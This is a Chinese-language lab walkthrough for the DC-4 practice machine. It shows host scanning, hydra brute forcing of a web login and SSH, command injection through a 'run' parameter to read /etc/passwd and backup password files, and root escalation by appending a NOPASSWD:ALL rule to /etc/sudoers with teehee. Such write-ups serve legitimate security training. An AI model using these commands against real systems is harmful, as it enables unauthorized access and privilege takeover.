DC-4靶机

扫描IP,找到与靶机一样的MAC地址

arp-scan -l

image-20230729135455077

image-20230729135343478

目标Ip地址:192.168.149.134
主机地址:192.168.149.129

扫描靶机Ip,查看是否有信息

nmap -sS -A 192.168.149.134

image-20230729140024053

发现没有什么重要的信息,可以登录网站查看

image-20230729140435517

发现是通过密码登录,可以尝试用hydra进行密码爆破,也可以使用bp爆破

使用hydra密码爆破

hydra -l admin -P top1000.txt 192.168.149.134 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

这是一个 Hydra 的命令行指令,用于暴力破解 Web 应用程序的登录。解释如下:

hydra:命令名,表示使用 Hydra 工具。

-l admin:指定用户名为 admin。

-P top1000.txt:指定密码字典为当前目录下的 top1000.txt。

192.168.149.134:指定要攻击的服务器 IP 地址。

http-post-form:指定使用 HTTP POST 请求方式。

"/login.php:username=^USER^&password=^PASS^:S=logout":指定登录页面地址 /login.php,并使用 username 和 password 作为参数名来传递用户名和密码。其中 ^USER^ 和 ^PASS^ 含义为在暴力破解过程之中将要用到的用户名和密码,而 :S=logout 则是指当程序返回值为 logout 时,认为破解成功并退出程序。

-F:如果成功的话,停止猜测其他密码。

综上所述,上述命令的作用就是对目标服务器 192.168.149.134 的 /login.php 页面进行暴力破解登录,用户名为 admin,密码字典为 top1000.txt

image-20230729142949275

这儿爆破出一个密码:happy,试着登陆一下网站

登陆上网站后,没有什么可用的信息

image-20230729143242107

image-20230729143257072

image-20230729143621572

发现run是一个系统运行的命令,所以我们可以对他进行抓包看看

使用bp对run进行抓包

image-20230729143824635

在radio后面添加cat /etc/passwd执行,然后看到家目录有三个用户:charles、jim、sam

image-20230729151220739

image-20230729151315662

继续查看每个用户的家目录:ls -lh /home/jim
发现只有jim用户有信息

image-20230729151811490

扩展知识点:backups 通常指备份文件或备份数据,是指在数据正常工作时期定期进行数据复制的过程。备份的数据可能是操作系统、用户文件、数据库、应用程序、虚拟机、云数据等。备份的目的是为了在出现数据损坏或丢失时能够快速地恢复数据。备份数据可以通过多种途径来实现,例如本地磁盘、网络存储、云存储等,备份也可以定期自动或手动进行。通常每个组织都需要制定自己的备份策略,以确保备份数据的可靠性和完整性。
继续查看backups文件:ls -lh /home/jim/backups

image-20230729152027826

找到了密码,打开:cat /home/jim/backups/old-passwords.bak

image-20230729152205045

创建字典,进行密码爆破

创建一个密码字典pass.txt,用户字典user.txt,密码爆破
hydra -L user.txt -P pass.txt ssh://192.168.149.134

image-20230729153425360

jim
jibril04

进入jim用户

ssh jim@192.168.149.134

image-20230729153603656

发现有一份邮件

image-20230729154017059

/var/mail 是一个系统目录,用于存储用户的邮件。在某些 Linux 发行版(如 Ubuntu)中,该目录被符号连接到 /var/spool/mail 目录。在邮件服务器中,通常使用此目录来存储接收到的电子邮件,然后通过 IMAP 或 POP3 等协议提供给用户。当系统接收到邮件时,邮件服务器会自动将邮件写入到相应的用户邮箱文件中,文件名通常与用户名相同。

在某些系统中,用户可以使用 mail 或其他电子邮件客户端软件读取该目录中的邮件。如果您在系统中配置了邮件服务器,则通常会定期清除该目录中的过时邮件以释放磁盘空间。因此,如果您要查找过去一段时间内丢失的电子邮件,请检查该目录中的 email 文件。

查看邮件

cd /var/mail

image-20230729154156468

image-20230729154247394

得到账号,密码:
charles
^xHhA&hvim0y

进入charles用户

su charles
进入之后发现没有权限,进行提权

image-20230729154527547

用户提权

查看以下可以运行的命令:sudo -l

image-20230729154850504

发现可以使用teehee,

可以使用命令:
echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers

这句话的意思是将charles用户赋予执行sudo的权限添加到/etc/sudoers里。
| 是管道符 将前面的输出添加到后面
sudo teehee -a 是用管理员权限使用teehee -a命令
teehee -a 是添加一条语句到 /etc/sudoers里
/etc/sudoers 里存着的用户都有执行sudo的权限。

image-20230729155858336

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值